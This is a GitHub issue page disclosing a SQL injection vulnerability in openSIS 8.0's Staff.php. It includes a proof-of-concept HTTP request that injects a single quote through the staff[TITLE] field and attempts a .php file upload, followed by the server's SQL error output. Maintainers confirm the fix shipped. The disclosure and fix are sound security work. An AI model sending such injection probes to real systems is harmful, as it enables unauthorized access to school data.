Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in function STAFF.PHP #203

Closed
quanhx11 opened this issue Sep 22, 2021 · 3 comments
Closed

SQL injection in function STAFF.PHP #203

quanhx11 opened this issue Sep 22, 2021 · 3 comments
Labels
Next Release Fix will be provided with the next release

Comments

@quanhx11
Copy link

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff[TITLE] parameter.
image
image

POC
image
REQUEST

POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
Content-Length: 132296
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[TITLE]"

'
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[FIRST_NAME]


-----------------------------42647140374471146523868129	
Content-Disposition: form-data; name="staff[MIDDLE_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[LAST_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[NAME_SUFFIX]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ALTERNATE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[GENDER]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="month_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="day_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="year_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ETHNICITY_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[EMAIL]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"

N
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[DISABILITY_DESC]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="file"; filename="alf\'a.php"
Content-Type: image/png


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="imgblob"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="upbtn"

UPLOAD
-----------------------------42647140374471146523868129--

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
		<TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
		</TR>
		</TABLE>
		<TABLE CELLSPACING=10 BORDER=0>
[…]

SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['staff'] to $value param.

  $staffs=sqlSecurityFilter($_REQUEST['staff']);
            foreach ($staffs as $column => $value) {
                if ($column == 'BIRTHDATE' && $value!='')
                {
                    $value = date("Y-m-d", strtotime($value));
                   
                }
@openSISAdmin
Copy link
Member

Please use the latest code from the repo......not the zip file and try this. We have committed several updates lately.

@sarika0lal
Copy link
Contributor

Hello,

We appreciate your observation and would like to inform that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Copy link
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Next Release Fix will be provided with the next release
Projects
None yet
Development

No branches or pull requests

3 participants